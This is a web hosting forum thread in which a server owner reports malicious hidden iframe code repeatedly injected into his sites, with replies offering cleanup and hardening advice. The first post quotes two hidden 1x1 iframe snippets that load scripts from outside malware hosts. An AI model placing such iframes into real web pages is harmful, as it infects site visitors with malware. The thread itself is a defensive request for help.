I have big problem with code

A

adamp

Verified User
Joined
Jan 11, 2007
Messages
137
hello
i have DA server/
I have phenomenon that returns on herself all the time. this code that enters and installs himself in the sites code.

this is the code

Code: 
<iframe src='http://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>

I go to this link
http://updateservernet.cn and on the server install DA

In the past this code was different, it was like that:

Code: 
<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>

when people enter to the sites their computer identifies a virus and the computer is blew


someone can help? and know what is problem.
 
adamp said:
I have phenomenon that returns on herself all the time. this code that enters and installs himself in the sites code.

this is the code

Code: 
<iframe src='http://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>

I go to this link
http://updateservernet.cn and on the server install DA

In the past this code was different, it was like that:

Code: 
<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>

when people enter to the sites their computer identifies a virus and the computer is blew
Click to expand...
Hope you are not hit by the Random JaveScript Rootkit. Read this article for more information: http://servertune.com/kbase/entry/258/
 
andyreed said:
Hope you are not hit by the Random JaveScript Rootkit. Read this article for more information: http://servertune.com/kbase/entry/258/
Click to expand...

There is no proof that this trojan/virus is affecting any server types (control panel) outside of a cpanel server. I'v yet to see any other control panel affected by the trojan as stated on your site. This is probably why you have not see any incidance of this trojan reported here on the DA forums and i havent see it reported on Plesk, Ensim or any other panel other than cpanel.

I cant say for sure if the origional poster here is really running a DA box or if his really infected with the same trojan.

Also, there are no reports of the Javascript Trojan affecting FreeBSD servers. They seem to be immune to these attacks since the kernels between the two system types are very different.
 
Last edited:
pucky said:
There is no proof that this trojan/virus is affecting any server types (control panel) outside of a cpanel server. I'v yet to see any other control panel affected by the trojan as stated on your site. This is probably why you have not see any incidance of this trojan reported here on the DA forums and i havent see it reported on Plesk, Ensim or any other panel other than cpanel.

I cant say for sure if the origional poster here is really running a DA box or if his really infected with the same trojan.

Also, there are no reports of the Javascript Trojan affecting FreeBSD servers. They seem to be immune to these attacks since the kernels between the two system types are very different.
Click to expand...

and what ccan i do with this?
 
adamp said:
and what ccan i do with this?
Click to expand...
Since your sites are injected with JavaScript IFRame code, you need to do the following:

1. Scan and remove all files infected wit this code. We have our own scripts to scan and disinfect files with JS Code; Sorry, but we are not making these scripts available to the public at this time.

2. Right after files disinfected, you must secure and harden your server to prevent future injection with the JS code.

3. DO NOT give shell or jailshell access to ANYONE.

4. Update your server’s applications and services to the latest release, especially security patches and monitor the server closely for any unsuspected activity.

If you don't know how to do these things, you can seek professional help. Good luck.
 
Last edited:
andyreed said:
Please, discard that response. Since your sites are injected with JavaScript IFRame code, you need to do the following:

1. Scan and remove all files infected wit this code. We have our own scripts to scan and disinfect files with JS Code; Sorry, but we are not making these scripts public at this time.

2. Right after files disinfected, you must secure and harden your server to prevent future injection with the JS code.

3. DO NOT give shell or jailshell access to ANYONE.

4. Update your server’s applications and services to the latest release, especially security patches and monitor the server closely for any unsuspected activity.

If you don't know how to do these things, you can seek professional help. Good luck.
Click to expand...

you can give me the scripts that scan and remove and tell me please how i can secure the server?

my server is all time update.
 
adamp,

He already said he wouldn't make his scripts public, in paragraph 1.

Jeff
 
I'm having the sam problem, and my hosting is share hosting. I have found the script and deleted unfortunately it's keep on coming back. Is the hosting company server infected? does anyone know how they able to keep on doing this???????????????????????????????????????????
 
newbie24 said:
I'm having the sam problem, and my hosting is share hosting. I have found the script and deleted unfortunately it's keep on coming back. Is the hosting company server infected? does anyone know how they able to keep on doing this???????????????????????????????????????????
Click to expand...

Clamav can scan and remove infected files
 
You must log in or register to reply here.
Back
Top